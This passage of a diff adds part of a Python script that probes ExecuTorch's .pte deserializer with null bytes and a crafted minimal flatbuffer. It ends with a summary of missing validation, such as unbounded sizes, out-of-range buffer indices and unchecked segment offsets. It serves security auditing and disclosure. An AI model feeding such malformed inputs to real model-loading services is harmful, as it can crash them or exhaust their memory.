+     print(f" [VULNERABLE] 100 null bytes accepted by deserialize_pte_binary()")
+ except Exception as e:
+     print(f" [PROTECTED] Null bytes: {type(e).__name__}: {str(e)[:80]}")
+
+ # Test 3: Minimal valid-ish flatbuffer (4 bytes root offset + 4 bytes magic + minimal data)
+ # FlatBuffer format: 4 bytes offset to root + 4 bytes file_identifier + data
+ # ET magic bytes are "ETxx" where xx are digits/letters
+ minimal_fb = struct.pack("<I", 8) + b"ET00" + b"\x00" * 8
+ try:
+     result = deserialize_pte_binary(minimal_fb)
+     print(f" [VULNERABLE] Minimal valid-ish flatbuffer accepted!")
+     print(f" -> Program version: {result.program.version}")
+     print(f" -> No magic byte verification beyond what flatc does")
+ except Exception as e:
+     print(f" [PARTIAL] Minimal flatbuffer: {type(e).__name__}: {str(e)[:100]}")
+
+
+ # ============================================================
+ # Summary
+ # ============================================================
+ print("\n" + "=" * 70)
+ print("SUMMARY")
+ print("=" * 70)
+ print("""
+ Key findings for ExecuTorch .pte format:
+
+ 1. NO DIMENSION UPPER BOUND: Tensor sizes can be 2^31-1 or higher,
+    accepted without validation. 10000-dimensional tensors accepted.
+
+ 2. NO LIST SIZE LIMITS: execution_plan, chains, operators, values etc.
+    have no upper bounds; this can cause OOM during deserialization.
+
+ 3. NEGATIVE/ZERO DIMS ACCEPTED: Negative and zero tensor dimensions
+    pass through _json_to_dataclass() without rejection.
+
+ 4. BUFFER INDEX OOB: Tensors can reference non-existent buffer indices,
+    causing runtime crashes.
+
+ 5. NO STRUCTURAL VALIDATION: deserialize_pte_binary() performs zero
+    validation on the binary blob before parsing. No magic byte check,
+    no size limits, no sanity checks.
+
+ 6. NO check_model() EQUIVALENT: The verifier only checks graph-level
+    semantics (operator validity, tensor contiguity) and is OPTIONAL
+    (controlled by _check_ir_validity flag).
+
+ 7. SEGMENT OFFSETS UNVALIDATED: Segment offsets can be negative or
+    point past end of data; they are accepted without rejection.
+
+ Compared to ONNX (check_model, shape inference) and TF SavedModel,
+ ExecuTorch's loading pipeline is completely trusting of input data.
+ """)